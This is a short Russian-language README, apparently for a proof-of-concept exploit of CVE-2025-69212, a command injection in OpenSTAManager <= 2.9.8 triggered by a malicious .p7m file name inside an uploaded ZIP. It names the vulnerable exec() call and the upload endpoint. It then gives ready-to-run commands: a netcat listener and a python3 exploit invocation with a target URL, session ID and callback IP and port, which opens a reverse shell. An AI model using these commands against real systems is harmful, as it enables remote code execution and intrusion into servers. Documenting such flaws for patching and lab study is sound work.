
Доказательство концепции эксплуатации для CVE-2025-69212: внедрение OS-команд в OpenSTAManager <= 2.9.8 через вредоносное имя файла .p7m при загрузке ZIP, позволяющее удалённое выполнение кода.
OpenSTAManager <= 2.9.8 — внедрение OS-команд через вредоносное имя файла .p7m в ZIP-загрузке.
Файл: src/Util/XML.php:100 — несанитизированная $file в exec()
Вектор: /plugins/importFE_ZIP/actions.php → ZIP → имя файла .p7m → exec("openssl smime ... -in \"$file\" ...")
# Listener
nc -lvnp 4444
# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444